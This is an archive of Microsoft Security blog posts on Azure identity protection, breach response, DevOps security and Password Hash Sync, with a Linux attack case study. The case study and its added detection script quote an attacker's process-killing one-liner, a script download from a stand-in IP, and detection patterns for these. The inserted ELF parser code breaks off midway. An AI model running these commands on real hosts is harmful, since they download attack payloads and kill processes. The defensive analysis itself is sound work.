Category Archives: Azure Security

Investigating identity threats in hybrid cloud environments

As the modern workplace transforms, the identity attack surface area is growing exponentially, across on-premises and cloud, spanning a multitude of endpoints and applications. Security Operations (SecOps) teams are challenged to monitor user activities, suspicious or otherwise, across all dimensions of the identity attack surface, using multiple security solutions that often are not connected. Because identity protection is paramount for the modern workplace, investigating identity threats requires a single experience to monitor all user activities and hunt for suspicious behaviors in order to triage users quickly.

Today, Microsoft is announcing the new identity threat investigation experience, which correlates identity alerts and activities from Azure Advanced Threat Protection (Azure ATP), Azure Active Directory (Azure AD) Identity Protection, and Microsoft Cloud App Security into a single investigation experience for security analysts and hunters alike.

Modern identity attacks leverage hybrid cloud environments as a single attack surface

The identity threat investigation experience combines user identity signals from your on-premises and cloud services to close the gap between disparate signals in your environment and leverages state-of-the-art User and Entity Behavior Analytics (UEBA) capabilities to provide a risk score and rich contextual information for each user. It empowers security analysts to prioritize their investigations and reduce investigation times, ending the need to toggle between identity security solutions. This gives your SecOps teams more time and the right information to make better decisions and actively remediate identity threats and risks.

Azure ATP provides on-premises detections and activities with abnormal behavior analytics to assist in investigating the most at-risk users. Microsoft Cloud App Security detects and alerts security analysts to the potential of sensitive data exfiltration for first- and third-party cloud apps. And Azure AD Identity Protection detects unusual sign-in information, implementing conditional access on the compromised user until the issue is resolved. Combined, these services analyze the activities and alerts, using UEBA, to determine risky behaviors and provide you with an investigation priority score to streamline incident response for compromised identities.

To further simplify your SecOps workflows, we embedded the new experience into the Cloud App Security portal, regardless of whether you’re using Microsoft Cloud App Security today. While it enriches each alert with additional information, it also allows you to easily pivot from the correlated alert timeline directly into a deeper dive investigation and hunting experience.

User investigation priority

We’re adding a new dimension to the current investigation model, which is based on the total number of alerts: a user investigation priority, determined by all user activities and alerts that could indicate an active advanced attack or insider threat.

To calculate the user investigation priority, each abnormal event is scored based on the user’s profile history, their peers, and the organization. Additionally, the potential business and asset impact of any given user is analyzed to determine the investigation priority score.

The new concept is included on the updated user page, which provides relevant information about who the user is, the investigation priority score, how it compares across all users within the organization, and abnormal alerts and activities of the user.

In the image below, the user’s investigation priority score of 155 puts them in the top percentile within the organization, making them a top user for a security analyst to investigate.

Identity threat investigation user page.

The score is surfaced on the main dashboard to help you get an immediate idea of which users currently represent the highest risk within your organization and should be prioritized for further investigation.

Top users by investigation priority on the main dashboard.

Improved investigation and hunting experience

Beyond signal correlation and a redesigned user page, the new identity threat investigation experience also adds new and advanced investigation capabilities specifically for Azure ATP customers, regardless of whether you choose to use Azure AD Identity Protection and/or Microsoft Cloud App Security.

These capabilities include the:

  • Ability for security analysts to perform threat hunting with greater context over both cloud and on-premises resources by leveraging advanced filtering capabilities and enriched alert information.
  • Visibility and management of Azure AD user risk levels with the ability to confirm compromised user status, which changes the Azure AD user risk level to High.
  • Creation of activity policies to determine governance actions and leverage built-in automation capabilities via the native integration with Microsoft Flow to more easily triage alerts.

New threat hunting experience to analyze alerts and activities.

Get started with the public preview today

If you’re one of the many enterprise customers already using Azure ATP, Microsoft Cloud App Security, and/or Azure AD Identity Protection and want to test the new identity threat investigation experience, get started by checking out our comprehensive technical documentation.

If you’re just starting your journey, begin a trial of Microsoft Threat Protection to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

We would love your feedback! Find us on the Azure ATP Tech Community and send us your questions or feedback on the new experience.

The post Investigating identity threats in hybrid cloud environments appeared first on Microsoft Security.

How to recover from a security breach

Experts estimate that ransomware attacks are up over 600 percent. For most companies, the issue isn’t if a cyberattack is going to happen, but when. Some security experts advise that the best way to recover from a security breach is to plan for it before it happens.

Today we take you through:

  • Strategies for building a plan for a cybersecurity attack.
  • Four tips for sharing information with your customers.
  • How to mitigate or prevent cyber incidents.

Strategies for building a plan for a cybersecurity attack

It’s natural to focus on technology and systems during a cyberattack, but it’s just as important to understand how your business is going to respond to the event—internally, to your customers, and to the general public. How do you escalate information and to whom? You often need to integrate input from communications, operations, IT, finance, and other departments. That’s why creating a plan is so important. You want to make sure you can respond quickly and have the right outcomes for your business priorities.

You also need to identify the impact on your systems. Understanding the technology impact during a breach often involves defining an internal security operations center (SOC) process flow, decision trees, and a communications escalation process that identifies when you get information, who is told about it, when they are told, and what they need to do about it. We often place information into different categories, which gives us the opportunity to classify what we know and gives the business the chance to think things through and build the plan before there’s an actual incident.

Four tips for sharing information with your customers

Companies that contain a security breach in less than 30 days can save millions of dollars. That’s an incentive. But the impact of a breach is more than just financial—it impacts your reputation.

Here are four tips for responding to customers in an efficient, thoughtful way that can mitigate the damage of the attack:

  1. Deliver the right message to your customers after a breach—quickly. Companies used to have the luxury to wait and let the investigation play out before updating the public. Now there is the expectation that if a company has information, it’s doing a disservice to its customers by withholding it.
  2. Be simple and clear. This is where working with your communications team is essential. Practice your communications and response plan before it happens to learn how to improve.
  3. Be cautious. Being transparent and clear doesn’t mean that you have to say absolutely everything about the investigation. In technology, investigations can lead to additional discoveries. Make it clear that the investigation is ongoing and provide updates as the story unfolds. Don’t say anything that you wouldn’t stake your job on, because you might have to.
  4. Divulge any information that could benefit customers who have been affected by the breach and think beyond your business. In 2018, Under Armour reported that their fitness and nutrition app, MyFitnessPal, was hacked. Email and hashed passwords were stolen—affecting 150 million users. Under Armour advised customers to change the password for their app and anywhere it was used. That action demonstrated to customers that the company thought about the impact of the breach beyond their product.

Increasingly, companies are expected to think about their customers beyond their specific relationship and consider how a data compromise impacts a customer’s relationship with other companies and accounts.

How to mitigate or prevent cyber incidents

The modern threat landscape is growing in sophistication and volume. As everything is becoming more digitized, there are more ways for bad actors to harm your company.

Here are some best practices that you can use to monitor your environment and combat threats:

Visibility is a key component to effective cybersecurity and monitoring. This includes having a good SOC and visibility into mobile users, remote workers, and business partners. The more you know about what’s happening on your network, including the cloud, the more effectively you can safeguard your environment.

Cyber hygiene and up-to-date security tools are necessities for businesses of all sizes.

  • Even if you’re a small or mid-size company, you can still have good security practices. You can have controls in place, outsource to a company, or work with your provider to get insight into your network. Microsoft Azure automatically gives you access to see what’s happening in your part of the cloud. Azure Security Center enables everybody to see what’s happening in a hybrid cloud environment. You don’t have to have a big cyber defense center to build good security practices.
  • Security solutions, such as Microsoft Threat Protection, provide multiple layers of threat protection across data, applications, devices, and identities and can help protect your company from advanced cyber threats. The security services in Microsoft Threat Protection, enriched by 6.5 trillion daily signals from the Microsoft Intelligent Security Graph, work together to mitigate today’s threats.

Get started

For more detail on actionable tips from security experts on how to recover after a data breach, watch the video, How to recover from a security breach.

The post How to recover from a security breach appeared first on Microsoft Security.

4 best practices to help you integrate security into DevOps

Microsoft’s transition of its corporate resources to the cloud required us to rethink how we integrate security into the agile development environment. In the old process, we often worked on 6- to 12-month development cycles for internal products. The security operations team was separate from the application development team and was responsible for ensuring that applications met security requirements. There was time to troubleshoot security between the two teams. Once we shifted to a shorter development cycle, we had to compress the new process to bake security into DevOps.

Our experience has led us to adopt four best practices that guide our thinking about integrating security with DevOps:

  1. Inventory your cloud resources.
  2. Establish a governance structure for cloud services.
  3. Give DevOps accountability for security.
  4. Redefine centralized security.

This post walks you through these tenets with some advice we hope you can apply to your own organization.

Inventory your cloud resources

Cloud subscriptions are so easy to spin up that many organizations don’t have a comprehensive understanding of which teams are using which services. This makes it challenging to manage your costs and enforce security policies. If you are uncertain which services you are currently paying for, billing is a good place to start.

Establish a governance structure for cloud services

Once you understand your cloud inventory, you can begin the work of making sure your investments align with your business strategies. This may mean limiting which services your organization uses to maximize the ones that will help you meet your business goals. Then, align your organization to your cloud strategy by defining a governing structure:

  • Develop business scenarios that define acceptable use and configuration of cloud resources.
  • Define architecture and patterns for the cloud services you plan to use.
  • Limit who can create new subscriptions.

Give DevOps accountability for security

The only way to effectively enforce security policies in a short development cycle is to integrate security into the application development process. Early in our evolution, we dropped security team members into application development teams to create a single team with shared goals. This revealed cultural challenges and unexamined assumptions. Initially, both the application developers and the security team expected to do their jobs as they had in the past: application developers wrote code, and then security operations queued up issues to address. This proved unworkable for two reasons. Security analysts were queuing up more security tasks than could fit within the cycle, and the application developers were often confused because security operations underestimated how well the developers already understood the nuances of security.

The only way to meet our goals was to shift accountability for security to the DevOps teams. We wanted application developers to try to solve security issues as part of their process. This required education, but we also implemented some practices that encouraged the team to take on that responsibility:

  • Secure DevOps Kit for Azure—The Secure DevOps Kit for Azure provides scripts that can be configured for each resource. During development and before production, DevOps can easily validate that security controls are at the right level.
  • Security scorecard—The scorecard highlights which members of the team are skilled at addressing security and encourages people to improve and collaborate with each other.
  • Penetration testing—When a red team conducts a penetration test of an application, the results typically inspire the team to take security more seriously.

Redefine centralized security

We experimented with eliminating a central security team entirely, but ultimately, we realized that we needed a centralized team to monitor the big picture and set baselines. They establish our risk tolerance and measure security controls across subscriptions. They also automate as many of the security controls as they can. This includes configuring the Secure DevOps Kit for Azure. This team also needed training to better understand the vulnerabilities of the cloud. Tabletop exercises to talk through possible attacks with red teams were one way they got up to speed.

As our evolving process suggests, our biggest challenge was shifting culture and mindset. We recommend that you take time to define roles and start with a small team. You can expect to continuously discover better ways to improve teamwork and the security of your process and your applications.

Get started

For more details on how we evolved our security process for the cloud, watch the Speaking of security: Cloud migration webinar and get the Secure DevOps Kit for Azure.

The post 4 best practices to help you integrate security into DevOps appeared first on Microsoft Security.

Step 10. Detect and investigate security incidents: top 10 actions to secure your environment

“Step 10. Detect and investigate security incidents” is the final installment in the Top 10 actions to secure your environment blog series. Here we walk you through how to set up Azure Advanced Threat Protection (Azure ATP) to secure identities in the cloud and on-premises.

Azure ATP is a service in the Microsoft Threat Protection solution, which integrates with Azure Identity Protection and Microsoft Cloud App Security and leverages your on-premises Active Directory signals to identify suspicious user and device activity with both known-technique detection and behavioral analytics. It protects user identities and credentials stored in Active Directory and allows you to view clear attack information on a simple timeline for fast triage. Integration with Windows Defender Advanced Threat Protection (Windows Defender ATP) provides a single interface to monitor multiple entry points.

Azure ATP works by analyzing data sent by Azure ATP sensors that parse network traffic from domain controllers (Figure 1). In this blog, we share resources and advice that will help you install and configure the Azure ATP sensors following these steps:

  • Plan your Azure ATP capacity.
  • Install the Azure ATP sensor package.
  • Configure Azure ATP sensor.
  • Detect alerts.

Infographic showing the Azure ATP architecture: Azure ATP sensors parse network traffic from domain controllers and send it to Azure ATP for analysis.

Figure 1: Azure ATP sensors parse network traffic from domain controllers and send it to Azure ATP for analysis.

Plan your Azure ATP capacity

Before you begin your Azure ATP deployment, you’ll need to determine what resources are required to support your Azure ATP sensors. An Azure ATP sensor analyzes network traffic and reads events locally, without the need to purchase and maintain additional hardware or configurations. The Azure ATP sensor also supports Event Tracing for Windows (ETW), which provides the information for multiple detections. ETW-based detections include suspected DCShadow attacks that attempt to use domain controller replication requests and domain controller promotion.

The recommended and simplest way to determine capacity for your Azure ATP deployment is to use the Azure ATP sizing tool. Once you download and run the tool, the details in the “Busy Packets/sec” field will help you determine the resources required for your sensors.

Next, you create your Azure Advanced Threat Protection instance and connect it to your Active Directory forest. You’ll need an Azure Active Directory (Azure AD) tenant with at least one global/security administrator. Each Azure ATP instance supports multiple Active Directory forests and a Forest Functional Level (FFL) of Windows 2003 and above.

Install the Azure ATP sensor package

Once Azure ATP is connected to Active Directory, you can download the sensor package. Click Download from the Azure ATP portal to begin the process. You need to copy the access key for use when you install the sensor (Figure 2).

Screenshot showing the access key and sensor setup download button in the Azure ATP portal.

Figure 2: The access key is used in installation.

Next, verify the domain controller(s) on which you intend to install Azure ATP sensors have internet connectivity to the Azure ATP Cloud Service. These URLs automatically map to the correct service location for your Azure ATP instance:

  • For console connectivity: <your-instance-name>.atp.azure.com (For example, “Contoso-corp.atp.azure.com”)
  • For sensors connectivity: <your-instance-name>sensorapi.atp.azure.com (For example, “contoso-corpsensorapi.atp.azure.com”)

Note: There is no “.” between <your-instance-name> and “sensorapi”.
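The two hostnames above are easy to get wrong because of the missing dot, so here is an added connectivity check (example code written for this page, not Microsoft's tooling) that builds both names from the instance name and classifies whether each endpoint is unreachable at the DNS, TCP or TLS layer. The instance name contoso-corp is a constructed example.

```python
import re
import socket
import ssl

# Constructed example: the instance name as shown on the Azure ATP portal.
INSTANCE_NAME = "contoso-corp"


def sensor_endpoints(instance_name: str) -> dict:
    """Return the two hostnames a domain controller must be able to reach.

    The sensor API hostname has no "." between the instance name and
    "sensorapi"; that is the quirk the note above calls out.
    """
    name = instance_name.strip().lower()
    # Instance names are DNS labels: letters, digits and hyphens only.
    if not re.fullmatch(r"[a-z0-9](?:[a-z0-9-]*[a-z0-9])?", name):
        raise ValueError(f"invalid Azure ATP instance name: {instance_name!r}")
    return {
        "console": f"{name}.atp.azure.com",
        "sensor": f"{name}sensorapi.atp.azure.com",
    }


def check_endpoint(host: str, port: int = 443, timeout: float = 5.0) -> str:
    """Classify reachability of one endpoint: "ok", "dns", "tcp" or "tls"."""
    try:
        socket.getaddrinfo(host, port)
    except socket.gaierror:
        return "dns"  # name does not resolve: DNS or forwarder problem
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw:
            ctx = ssl.create_default_context()
            with ctx.wrap_socket(raw, server_hostname=host):
                return "ok"  # TCP connect and TLS handshake both succeeded
    except OSError as exc:
        # ssl.SSLError subclasses OSError; separate handshake failures
        # (for example an intercepting proxy) from plain TCP failures.
        return "tls" if isinstance(exc, ssl.SSLError) else "tcp"


def check_instance(instance_name: str) -> dict:
    """Check both endpoints and return {role: status}."""
    return {role: check_endpoint(host)
            for role, host in sensor_endpoints(instance_name).items()}


if __name__ == "__main__":
    for role, host in sensor_endpoints(INSTANCE_NAME).items():
        print(f"{role:8} {host:45} {check_endpoint(host)}")
```

On a domain controller that reaches the internet only through a proxy, a "tcp" result from this direct check is expected and does not by itself indicate a sensor problem.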

Extract the files from the ZIP and run the Azure ATP sensor setup.exe, which initiates the installation wizard. When you get to the Configure the Sensor screen, enter the access key you copied during the download.

Note that all domain controllers in your environment should be covered by an Azure ATP sensor. The Azure ATP sensor supports the use of a proxy.

For more information on proxy configuration, see Configuring a proxy for Azure ATP.

Configure the Azure ATP sensor

The domain synchronizer is responsible for synchronization between Azure ATP and your Active Directory domain. Depending on the size of the domain, the initial synchronization may take time and is resource intensive. We recommend setting at least one domain controller as the domain synchronizer candidate per domain. This ensures Azure ATP is actively scanning your network at all times. By default, Azure ATP sensors aren’t domain synchronizer candidates. To manually set an Azure ATP sensor as a domain synchronizer candidate, switch the domain synchronizer candidate toggle option to ON in the configuration screen (Figure 3).

Screenshot showing the domain synchronizer candidate toggle switched to ON.

Figure 3: The domain synchronizer candidate toggle option set to ON in the configuration screen.

Next, manually tag groups or accounts as sensitive to enhance detections. This is important because some Azure ATP detections, such as sensitive group modification detection and lateral movement paths, rely on sensitive groups and accounts.

We also recommend that you integrate Azure ATP with Windows Defender ATP. Windows Defender ATP monitors your endpoints and the integration provides a single interface to monitor and protect your environment. It is easy to turn on the integration from the Azure ATP portal (Figure 4).

Screenshot showing the Integration with Windows Defender ATP toggle switched to ON.

Figure 4: A simple toggle enables integration with Windows Defender ATP.

You can also integrate with your VPN solution to collect additional user information, such as the IP addresses and locations where connections originated. This complements the investigation process by providing additional information on user activity as well as a new detection for abnormal VPN connections.

Detect alerts

After you set up Azure ATP, we recommend that you set up an Azure ATP security alert lab to help you better understand the alerts that may be generated in your environment. The lab includes a reconnaissance playbook that shows how Azure ATP identifies and detects suspicious activities from potential attacks. The lateral movement playbook lets you see Azure ATP’s lateral movement path threat detections and security alerts. In the domain dominance playbook, you’ll simulate some common domain dominance methods. For best results, set up your lab as close as possible to the instructions in the tutorial.

When Azure ATP is configured, you will be able to manage security alerts in the Security Alerts Timeline of the Azure ATP portal. Azure ATP security alerts provide tools to discover which suspicious activities were identified on your network and the actors and computers involved in the threats. Alerts are organized by threat phase, graded for severity, and color-coded to make them easy to visually filter.

Learn more

This completes our series, “Top 10 actions to secure your environment.” Review the entire series for advice on setting up other Microsoft 365 security products, such as Azure AD or Microsoft Cloud App Security.

Resources

The post Step 10. Detect and investigate security incidents: top 10 actions to secure your environment appeared first on Microsoft Security.

Demystifying Password Hash Sync

This blog is part of a series of posts providing a behind-the-scenes look of Microsoft’s Detection and Response Team (DART). While responding to cybersecurity incidents around the world, DART engages with customers who are wary about using Password Hash Sync (PHS) or are not utilizing this service’s full capabilities. As customers can gain tremendous security benefits using the full capabilities of this service, we want to demystify PHS.

What PHS is and is not

What is PHS? First, let’s start with what it is not. PHS doesn’t sync actual passwords. Rather, it syncs hashes of passwords, each of which has undergone a per-user salt and 1,000 iterations of the HMAC-SHA256 key hashing algorithm before being sent to Azure Active Directory (Azure AD). Through our hands-on experiences, we’ve learned that many companies believe that Microsoft may have access to users’ passwords. Microsoft is committed to protecting your privacy, and it’s important to note that the SHA256 hash cannot be reversed—so the plain-text version of the password is never, and can never be, exposed to Microsoft.

The second important consideration is that, with PHS, your identity management provider moves from your current provider to Azure AD. This allows the organization to move from an identity management provider that is typically an on-premises server, requires maintenance, and carries the risk of server downtime, to a platform-as-a-service (PaaS) provider.

From a security perspective, organizations gain significant reliability advantages and improved capabilities by moving to PHS, including Smart Lockout, IP Lockout, and the ability to discover leaked credentials, as well as the benefits of utilizing Microsoft’s billions of worldwide data points as additional layers of security to your organization’s environment.

More about these key features:

  • Smart Lockout assists in blocking bad actors who are attempting to brute force passwords. By default, Smart Lockout locks the account from sign-in attempts for one minute after ten failed attempts. Smart Lockout tracks the last three bad password hashes to avoid re-incrementing the lockout counter. For more information on Smart Lockout, see Azure AD Smart Lockout.
  • IP Lockout works by analyzing those billions of sign-ins to assess the quality of traffic from each IP address hitting Microsoft’s systems. With that analysis, IP Lockout finds IP addresses acting maliciously, such as an IP that is password spraying the tenant, and blocks those sign-ins in real-time, while allowing the real user to continue to successfully sign in.
  • Microsoft Leaked Credentials Service acquires username/password pairs by monitoring public web sites and the Dark Web and by working with:
    • Researchers
    • Law enforcement
    • Microsoft Security teams
    • Other trusted sources

When the service acquires username/password pairs, the passwords are sent through the same hashing algorithm and are checked against Azure AD users’ password hashes. When a match is found (indicating a compromised credential), a “Leaked Credentials Risk Event” is created. Please see Azure AD Risk Events for additional information regarding Leaked Credentials.
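To make the salting and iteration described above concrete, here is an added Python model (written for this page, not Microsoft's implementation) of a per-user salted, 1,000-iteration HMAC-SHA256 derivation in PBKDF2 form, together with the leaked-credential comparison: each acquired username/password pair is run through the same derivation with that user's salt and compared to the stored value. It assumes a 16-byte salt and derives from the password directly; the real service derives from the existing on-premises credential hash rather than the plaintext, and the sample users and passwords are constructed.

```python
import hashlib
import hmac
import os

ITERATIONS = 1000  # the iteration count the post states
SALT_BYTES = 16    # assumption for this example; the post does not give the salt length


def phs_hash(password: str, salt: bytes, iterations: int = ITERATIONS) -> bytes:
    """Per-user salted, 1,000-iteration HMAC-SHA256 derivation (PBKDF2 form).

    Assumption: derives from the UTF-16LE password. The real service starts
    from the on-premises credential hash, not the plaintext; the salt and
    iteration structure is what this illustrates.
    """
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-16-le"), salt, iterations)


def register_user(username: str, password: str, directory: dict) -> None:
    """Store (salt, hash) for a user, the way a synced record would hold it."""
    salt = os.urandom(SALT_BYTES)
    directory[username] = (salt, phs_hash(password, salt))


def verify(username: str, password: str, directory: dict) -> bool:
    """Recompute with the stored per-user salt and compare in constant time."""
    if username not in directory:
        return False
    salt, stored = directory[username]
    return hmac.compare_digest(phs_hash(password, salt), stored)


def leaked_credential_matches(leaked_pairs, directory: dict) -> list:
    """Model the Leaked Credentials check: each acquired username/password
    pair goes through the same derivation with that user's salt and is
    compared to the stored hash. Returns the usernames that match."""
    return [user for user, pw in leaked_pairs if verify(user, pw, directory)]


def demo() -> dict:
    """Constructed scenario: two users share a password; one later appears
    in an acquired leak. Returns the values a reviewer would inspect."""
    directory = {}
    register_user("alice", "Spring2019!", directory)  # constructed sample password
    register_user("bob", "Spring2019!", directory)    # same password, different salt
    leaked = [("alice", "Spring2019!"), ("bob", "wrong-guess"), ("carol", "Spring2019!")]
    return {
        "hits": leaked_credential_matches(leaked, directory),
        # per-user salt: identical passwords do not produce identical hashes
        "same_password_same_hash": directory["alice"][1] == directory["bob"][1],
        "hash_len": len(directory["alice"][1]),
        # the stored value is not a bare SHA256 of the password
        "plain_sha256_matches": directory["alice"][1] == hashlib.sha256(b"Spring2019!").digest(),
    }


if __name__ == "__main__":
    print(demo())
```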

Another important benefit of PHS is that, should your tenant experience a Denial of Service (DoS) and/or password spray attack, Microsoft will take the brunt of that traffic. That traffic is directed at Microsoft, not at your on-premises Active Directory Federation Services (AD FS). When authentication happens via on-premises AD FS, your server is responsible for managing the load, which can cause downtime.

Moving an organization’s identity management provider to Azure AD and utilizing Password Hash Sync allows for both an increase in overall security posture and reduced management overhead. The security benefits, including leaked credentials, IP lockout, and Smart Lockout, all utilize Microsoft’s telemetry that gives organizations the power of Microsoft’s intelligence.

NOTE: If PHS is the secondary authentication method and you want to take advantage of Smart Lockout and IP Lockout, the primary authentication method must support these features. In a hybrid environment where Federated or Pass-through Authentication is primary, PHS is recommended as the secondary method, both as a redundancy mechanism and so that information for Leaked Credentials can be collected.

Learn more

To learn more about DART, our engagements, and how they are delivered by experienced cybersecurity professionals who devote 100 percent of their time to providing cybersecurity solutions to customers worldwide, please contact your account executive. Also, bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Read DART: the Microsoft cybersecurity team we hope you never meet for more about the DART team.

The post Demystifying Password Hash Sync appeared first on Microsoft Security.

Uncovering a Linux-based cyberattack using Azure Security Center

As more and more enterprises move to the cloud, they bring with them their own set of security challenges. Today, almost half of Azure virtual machines (VMs) are running on Linux, and as the Linux server population grows, so does the number of attacks targeting them. As detection capabilities advance, attackers are using new and stealthier techniques to stay undetected and persist with their motives. Azure Security Center, Microsoft’s cloud-based cyber solution, helps customers safeguard their cloud workloads as well as protect them from these threats.

In this blog post, we detail a real-world Linux attack whose purpose initially looked like crypto mining, but it turned out that the attacker’s intent was to use the compromised host as a launchpad for further large-scale attacks.

Incident details

After the initial successful SSH brute force compromise, the attacker downloaded a first-stage script, ‘tddwrt7s.sh’, using utilities like ‘wget’; this script delivers further payloads to the host. Azure Security Center surfaces this behavior via a “Detected suspicious file download” alert.

After the stage 1 download, the attacker executed the script, which tried multiple hosting URLs to find ‘dota.tar.gz’. Once a live hosting IP was found, the second-stage file was delivered into the directory ‘/tmp/.mountfs’. Most of these exploitation and persistence techniques are observed in the /tmp folder; in this case all activities were tracked under the /tmp/.mountfs and /tmp/.mountfs/.rsync directories. Naming directories with a leading dot hides them from a default directory listing, a common technique used by attackers.

Later, we see traffic to different mining pools including ‘mine.moneropool.com’ but nothing further that would confirm the purpose as mining cryptocurrency. The “Detected suspicious network activity” analytic triggered on this activity along with “Digital currency mining” analytic. This was followed by reconnaissance grep activity used by the attacker to get more information on the target machine to see if it had already been compromised and in use by other actors.

The attackers then used a bash script to search for and kill processes belonging to some of the above-mentioned miners, using this command:

ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9

Let’s talk more about what this command does. The first command, ps (process status) with the auxf flags, shows a tree view of parent-child processes. The first grep removes the grep process itself from this list, and the second grep extracts any xmrig (a well-known miner) process from the filtered list. awk prints the second column of each matching line, which is the process ID, and xargs passes those IDs to kill -9, which sends the SIGKILL signal.

What follows next is a series of pkill commands that kill processes using a couple of techniques:

  1. Match the entire process and argument list pattern.
  2. Forcefully terminate a process.

To get the maximum CPU usage and efficiency, attackers generally start deleting the existing coin miner instances and focus on deploying new instances of mining payload.
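As an added illustration (not from the original post or from Azure Security Center), the following Python detection pass runs rules for the indicators described above, the .sh download into /tmp, dot-prefixed directories under /tmp, the grep|xargs kill -9 and pkill -9 -f miner-killing patterns, and contact with mine.moneropool.com, over a few constructed command-line log lines, and flags a host when several distinct behaviors chain together. The log format, hostnames and IP address are constructed for the example.

```python
import re

# Constructed sample lines (not real telemetry) in a simple
# "<timestamp> <host> user=<user> cmd=<command line>" shape that mirrors
# the sequence described in the post.
SAMPLE_LOG = """\
2019-05-01T10:00:01Z web01 user=root cmd=wget -q http://198.51.100.7/tddwrt7s.sh -O /tmp/tddwrt7s.sh
2019-05-01T10:00:02Z web01 user=root cmd=sh /tmp/tddwrt7s.sh
2019-05-01T10:00:09Z web01 user=root cmd=mkdir -p /tmp/.mountfs/.rsync
2019-05-01T10:00:10Z web01 user=root cmd=tar xzf /tmp/.mountfs/dota.tar.gz -C /tmp/.mountfs
2019-05-01T10:00:30Z web01 user=root cmd=ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
2019-05-01T10:00:31Z web01 user=root cmd=pkill -9 -f xmrig
2019-05-01T10:00:40Z web01 user=root cmd=curl -s mine.moneropool.com:3333
2019-05-01T10:05:00Z web01 user=deploy cmd=systemctl restart nginx
"""

# Mining pool hostnames the post observed traffic to.
KNOWN_POOLS = ("mine.moneropool.com",)

# Each rule: (name, compiled regex applied to the command line).
RULES = [
    # wget/curl fetching a shell script, the first-stage download
    ("suspicious_script_download", re.compile(r"\b(?:wget|curl)\b.*\.sh(?:\s|$)")),
    # dot-prefixed directory directly under /tmp, hidden from a plain listing
    ("hidden_tmp_directory", re.compile(r"/tmp/\.[^\s/]+")),
    # grep for a known miner piped into kill -9, or pkill -9 -f on a pattern
    ("competing_miner_kill",
     re.compile(r"(?:grep\s+\S*xmrig.*\bkill\s+-9\b|\bpkill\s+-9\s+-f\b)")),
    ("mining_pool_contact", re.compile("|".join(re.escape(p) for p in KNOWN_POOLS))),
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


def parse_line(line: str):
    """Return the parsed fields of one log line, or None for malformed input."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def scan(log_text: str) -> list:
    """Run every rule over every command line; one finding per (line, rule)."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or not rec["cmd"]:
            continue
        for name, pattern in RULES:
            if pattern.search(rec["cmd"]):
                findings.append({**rec, "rule": name})
    return findings


def hosts_to_triage(log_text: str, min_distinct_rules: int = 3) -> list:
    """A host is worth triage when several distinct behaviors chain together,
    as they did in this incident: download, hidden directory, miner kill, pool."""
    by_host = {}
    for f in scan(log_text):
        by_host.setdefault(f["host"], set()).add(f["rule"])
    return sorted(h for h, rules in by_host.items() if len(rules) >= min_distinct_rules)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['host']} {f['rule']:28} {f['cmd']}")
    print("triage:", hosts_to_triage(SAMPLE_LOG))
```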

Generally, after this activity, traces of a cryptocurrency wallet or other mining-related activity become evident, but what followed next was a bit of a surprise.

It turns out that this machine appeared to have been used to target 20,000 different endpoints based on our timeline of attack analysis detailed below:

Azure Security Center caught most of the suspicious activities observed above and raised security alerts on them. To take the investigation further, we collaborated with our internal memory forensics team. Their analysis of the ELF payload revealed even more details about this attack campaign:

  • The payload had three important components:
    • tsm64: An ELF executable.
    • Libraries that tsm64 relied on for execution.
    • tsm: Code used to launch the tsm64 executable.
  • To make sure the payload could run on most distributions, the attackers shipped the libraries tsm64 depends on alongside it, rather than relying on whatever the victim had installed.
  • tsm: tsm is ld.so renamed. ld.so is the dynamic loader, the helper program that loads the shared libraries a program executable needs, prepares the program to run, and then runs it.
  • Dependent libraries: Dependency analysis of the tsm64 executable showed that it needs four libraries at run time, namely libpthread.so.0, libdl.so.2, libc.so.6, and ld-linux-x86-64.so.2.
  • tsm64: This is the executable the attacker ultimately wants to run. It turns out that tsm64 is a multi-threaded SSH brute force tool that attacks a set of IPs with a supplied list of passwords.
  • Analysis of the Procedure Linkage Table (PLT) of tsm64 showed its multi-threading, network communication, and password file reading capabilities. A subset of the system APIs it imports is listed below:
    • Networking: setsockopt, getsockopt, getsockname, connect, gethostname, socket, inet_ntoa, recvfrom, recv, bind, getaddrinfo, inet_pton, getpeername
    • Multi-threaded (pthread): pthread_getspecific, pthread_setspecific, pthread_cond_signal, pthread_mutex_init, pthread_create, pthread_cond_init, pthread_key_delete, pthread_self, pthread_join, pthread_equal, pthread_cond_wait, pthread_detach, pthread_once, pthread_mutex_lock, pthread_key_create, pthread_mutex_destroy, pthread_cond_broadcast, pthread_mutex_unlock, pthread_kill
    • Password file entry: getpwnam, getpwnam_r, getpwuid_r
  • The IP address list and the credentials for the brute force attack were downloaded into files with the innocuous names ‘a’ and ‘b.’ File ‘a’ contained a list of 20,000 different IP addresses, while file ‘b’ held the credentials. These files were later renamed to ‘ip’ and ‘p’ respectively and passed to tsm64.
  • Using the standard timeout utility, the tool was limited to run for at most 90 minutes.
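The dependency and PLT analysis described in the list above can be reproduced with a short static parser. The following is an added example, not code from the memory forensics team or from the original post: it reads the DT_NEEDED entries from an ELF64 file’s .dynamic section and the undefined entries of .dynsym (the symbols ld.so resolves at run time, which is what the PLT stubs call into), then buckets the imports by capability. Because the real sample is not available, the block builds a constructed minimal ELF64 with the same four library names and a handful of representative imports; the capability keyword sets are an assumption chosen for the example. For a real binary, pass its bytes to analyze_elf.

```python
"""Static triage of an ELF64 binary: list DT_NEEDED libraries and undefined (PLT-resolved)
symbols, then bucket the imports by capability. Pure standard library; no pyelftools."""
import struct

SHT_STRTAB, SHT_DYNAMIC, SHT_DYNSYM = 3, 6, 11
DT_NULL, DT_NEEDED = 0, 1
SHN_UNDEF = 0
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # Elf64_Ehdr, little-endian
SHDR = struct.Struct("<IIQQQQIIQQ")        # Elf64_Shdr
DYN = struct.Struct("<qQ")                 # Elf64_Dyn
SYM = struct.Struct("<IBBHQQ")             # Elf64_Sym

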